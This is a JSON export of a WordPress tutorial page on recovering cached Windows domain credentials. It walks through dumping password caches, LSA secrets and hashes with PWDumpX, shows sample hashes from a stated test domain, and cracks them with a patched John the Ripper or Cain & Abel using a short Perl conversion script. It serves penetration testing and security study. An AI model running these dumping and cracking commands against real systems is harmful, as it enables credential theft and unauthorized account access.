{"id":47,"date":"2008-09-19T11:17:39","date_gmt":"2008-09-19T17:17:39","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?page_id=47"},"modified":"2014-01-22T21:47:22","modified_gmt":"2014-01-23T03:47:22","slug":"windows-password-cache","status":"publish","type":"page","link":"https:\/\/www.jedge.com\/wordpress\/windows-password-cache\/","title":{"rendered":"Windows Password Cache"},"content":{"rendered":"

Now with more Password Caching power! ==> http:\/\/www.jedge.com\/wordpress\/windows-password-cache-mscache-mscash-v2\/<\/a><\/p>\n

Recovering Windows Password Cache Entries [pdf<\/a>]<\/p>\n

This document is ment to be a revised version of a tutorial found on Securiteam.com (http:\/\/www.securiteam.com\/tools\/5JP0I2KFPA.html<\/a>). The Securiteam.com document is no longer up to date and the links in the document no longer work.<\/p>\n

Windows domain users authenticate against a Domain Controller when they login. However, there are times when the Domain Controller is unavailable. To allow a user to authenticate Windows stores the password hash in the registry if they had previously logged on to the workstation or server. Windows stores by default the last ten users to authenticate on the workstation or server.<\/p>\n

The first utility to be able to extract these stored hashes was cachedump. This utility is no longer available from the original site but can be found if you search http:\/\/www.packetstormsecurity.org<\/a>.<\/p>\n

A new (now old as of 2010) utility, written by Read Arvin, has surfaced that includes the features of cachedump but allows it to be accomplished remotely. Reed’s site is no longer available. You can obtain PWDumpX from http:\/\/www.packetstormsecurity.org<\/a> here<\/a>.<\/p>\n

Description formally found at http:\/\/reedarvin.thearvins.com. See Internet Archive page here<\/a>.<\/p>\n

Allows a user with administrative privileges to retrieve the domain password cache, the password hashes, the password history hashes and the LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.<\/cite><\/p>\n

Description from http:\/\/www.packetstormsecurity.org<\/a><\/p>\n

PWDumpX allows a user with administrative privileges to retrieve the domain password cache, password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems. If an input list of remote systems is supplied, PWDumpX will attempt to obtain the domain password cache, the password hashes and the LSA secrets from each remote Windows system in a multi-threaded fashion (up to 64 systems simultaneously). The domain password cache, password hashes and LSA secrets from remote Windows systems are encrypted as they are transfered over the network. No data is sent over the network in clear text. This tool is a completely re-written version of cachedump, PWDump3e and LSADump2 which integrates suggestions\/bug fixes for PWDump3e and LSADump2 found on various web sites, etc.<\/cite><\/p>\n

Using PwdumpX to obtain password hashes. Note you must have a local administrator account on the server to obtain the hashes.<\/p>\n

For the purposes of this documentation I have created a test domain with test users.<\/p>\n

C:\\tools\\PWDumpX 1.4>pwdumpx
\nPWDumpX v1.4 | http:\/\/reedarvin.thearvins.com\/<\/kbd><\/p>\n

Usage: PWDumpX [-clph] <hostname | ip input file> <username> <password><\/kbd><\/p>\n

[-clph] -- optional argument
\n<hostname | ip input file> -- required argument
\n<username> -- required argument
\n<password> -- required argument<\/kbd><\/p>\n

-c -- Dump Password Cache
\n-l -- Dump LSA Secrets
\n-p -- Dump Password Hashes
\n-h -- Dump Password History Hashes<\/kbd><\/p>\n

If the <username> and <password> arguments are both plus signs (+), the
\nexisting credentials of the user running this utility will be used.<\/kbd><\/p>\n

Examples:
\nPWDumpX 10.10.10.10 + +
\nPWDumpX 10.10.10.10 administrator password<\/kbd><\/p>\n

PWDumpX -lp MyWindowsMachine + +
\nPWDumpX -lp MyWindowsMachine administrator password<\/kbd><\/p>\n

PWDumpX -clph IPInputFile.txt + +
\nPWDumpX -clph IPInputFile.txt administrator password<\/kbd><\/p>\n

(Written by Reed Arvin | reedarvin@gmail.com)<\/kbd><\/p>\n

C:\\tools\\PWDumpX 1.4>pwdumpx -clph 192.168.186.129 administrator $3cr3tp@$$w0rd
\nRunning PWDumpX v1.4 with the following arguments:
\n[+] Host Input: \"192.168.186.129\"
\n[+] Username: \"itadmin\"
\n[+] Password: \"$3cr3tp@$$w0rd\"
\n[+] Arguments: \"-clph\"
\n[+] # of Threads: \"64\"<\/kbd><\/p>\n

Waiting for PWDumpX service to terminate on host 192.168.186.129.<\/kbd><\/p>\n

Retrieved file 192.168.186.129-PWCache.txt
\nRetrieved file 192.168.186.129-LSASecrets.txt
\nRetrieved file 192.168.186.129-PWHashes.txt
\nRetrieved file 192.168.186.129-PWHistoryHashes.txt<\/kbd><\/p>\n

C:\\tools\\PWDumpX 1.4><\/kbd><\/p>\n

For the purpose of this discussion we will be focusing on 192.168.186.129-PWCache.txt the contents of which are below.<\/p>\n

amaynard:D2FA469C6F8B6C6A6AB0EF012674E10A:PR:PR.LOCAL
\nAdministrator:A1879B482C07E0FD148B7996158242EB:PR:PR.LOCAL
\nctripp:2F08AA22D65AC34AE7160AC7A3A1946A:PR:PR.LOCAL
\nbwyatt:B871D41A7401F0E404094AFC899D51C3:PR:PR.LOCAL
\nssossei:C89181138FB89F896B21739B2EC9A14C:PR:PR.LOCAL
\nsevans:B1176C2587478785EC1037E5ABC916D0:PR:PR.LOCAL<\/kbd><\/p>\n

Cracking these password hashes can be accomplished a couple of ways. The original article from Securiteam.com references a patch for Openwall\u2019s John the Ripper password cracker. This patch is no longer available from the links provided on the site and the patch is for an older version of John which may be difficult to obtain as well. All is not lost. I have an already patched version of John available on this site that you can compile, install, and use to crack MSCASH password hashes.<\/p>\n

Download myjohn.tgz from http:\/\/www.jedge.com\/utilities\/myjohn.tgz<\/a>
\nUnpack the Tarball and compile for you system. No need to install as you may already have a more updated version of John installed and we do not want to overwrite it. Just run the executable from the run folder. See below.<\/p>\n

root@edge-linuxpen:~\/downloads# tar zxf myjohn.tgz
\nroot@edge-linuxpen:~\/downloads# cd john\/src
\nroot@edge-linuxpen:~\/downloads\/john\/src# make generic
\nroot@edge-linuxpen:~\/downloads\/john\/src# ..\/run\/john --wordlist=\/home\/edge\/mangled.lst --format=mscash \/media\/EDGE\/192.168.186.129-PWCache.txt
\nLoaded 6 password hashes with 6 different salts (M$ Cache Hash [Generic 1x])
\nAsdf999 (sevans)
\nguesses: 1 time: 0:00:00:46 100% c\/s: 4515K trying: 8zyme - 8zzgl<\/kbd><\/p>\n

The password list used is from Openwall\u2019s CD they offer from their site for under $30 (http:\/\/www.openwall.com\/wordlists\/<\/a>).<\/p>\n

I have written a quick tutorial on how to obtain the latest version of John, patch it with the Jumbo patch (includes support for MSCASH\/MS Cache). That tutorial can be found here<\/a>.<\/p>\n

Another way to crack the password hashes is to use Cain & Abel on Windows. Cain does not support importing of the PwdumpX hash file. The file will have to be manually changed to the format supported by Cain. The file that needs to be edited is the CACHE.LST file found in the root folder for the Cain application. Typically C:\\Program Files\\Cain<\/p>\n

PwdumpX file format: user:hash:domain:domain
\nCain CACHE.LST format: domain[tab]user[tab][tab]hash[tab]<\/p>\n

A simple Perl script is include below to assist in the file conversion.<\/p>\n

\n#!\/usr\/bin\/perl\n\n$infile = @ARGV[0];\nchomp $infile;\nopen(INPUT, "$infile")||die("Can't open file");\n@raw_data=&lt;INPUT&gt;;\nclose(INPUT);\n\nforeach $line (@raw_data){\nchomp $line;\n@temp = split(\/:\/, $line);\nprint "$temp[2]\\t$temp[0]\\t\\t$temp[1]\\t\\n";\n}\n<\/code><\/pre>
\nC:\\>cache_parse.pl 192.168.186.129-PWCache.txt >> \"C:\\Program Files\\Cain\\CACHE.LST\"<\/kbd><\/p>\n
When you open up Cain and go to the Cracker tab you will see the password hashes loaded under MS-Cache Hashes (screen<\/a>). From there you can conduct a dictionary attack to crack the hashes (screen<\/a>).<\/p>\n
Good luck cracking!<\/p>\n","protected":false},"excerpt":{"rendered":"
Now with more Password Caching power! ==> http:\/\/www.jedge.com\/wordpress\/windows-password-cache-mscache-mscash-v2\/ Recovering Windows Password Cache Entries [pdf] This document is ment to be a revised version of a tutorial found on Securiteam.com (http:\/\/www.securiteam.com\/tools\/5JP0I2KFPA.html). The Securiteam.com document is no longer up to date and the links in the document no longer work. Windows domain users authenticate against a Domain […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-47","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/47","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=47"}],"version-history":[{"count":15,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/47\/revisions"}],"predecessor-version":[{"id":758,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/47\/revisions\/758"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=47"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}